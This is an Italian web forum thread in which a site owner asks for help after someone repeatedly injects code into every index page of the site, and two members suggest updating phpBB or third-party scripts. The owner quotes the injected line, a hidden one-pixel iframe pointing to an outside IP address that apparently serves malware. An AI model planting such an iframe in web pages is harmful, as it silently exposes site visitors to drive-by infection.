• User Newbie

    Problema grosso di sicurezza

    Ciao a tutti, scusatemi se non è la stanza giusta ma non ne ho trovate di specificamente dedicate alla sicurezza. Chiedo aiuto a chiunque di voi possa aiutarmi.

    Da qualche giorno qualcuno continua a modificare le index di tutto il mio sito (con qualsiasi estensione (.htm, .html, .php, ecc.) inserendo una riga di codice nel listato originale html che fa aprire in attraverso un tag iframe nascosto uno script che mi pare apra un virus.

    La riga di codice è questa :
    <iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>

    Continuo a rimettere a posto le pagine ma il tipo continua anche lui a rimodificarle. L'assistenza tecnica (sono in hosting presso hostingsolutions) dice che è colpa mia e che non entrano da ftp o altro ma per via di insicurezza delle pagine. Non mi sanno dire di più. Voi ?

    Ciao e grazie mille.

    Fil
    www.tigulliovino.it


  • Super User

    Problema analogo ad un altro membro del forum.

    Li l'injection veniva fatta probabilmente da phpBB, se utilizzi quel forum ti consiglio di aggiornarlo all'ultima versione.

    Altrimenti se utilizzi script di terzi parti controlla se esiste una versione più aggiornata e effettua l'update.


  • Super User

    Ciao 🙂

    Se usi delle statistiche free per il tuo sito, devi sapere che, molti di questi servizi creano problemi simili.

    Ci puoi far vedere un pagina con il problema?

    Sposto nella sezione sicurezza. :ciauz: